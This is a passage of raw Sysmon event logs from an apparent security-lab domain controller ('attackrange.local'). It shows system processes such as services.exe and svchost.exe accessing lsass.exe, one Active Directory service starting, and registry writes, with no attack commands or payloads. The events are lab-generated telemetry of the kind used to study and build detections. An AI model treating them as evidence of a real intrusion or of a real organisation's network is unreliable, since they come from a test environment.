AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.063{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:01.065{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:01.065{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8401100C:\Windows\system32\services.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 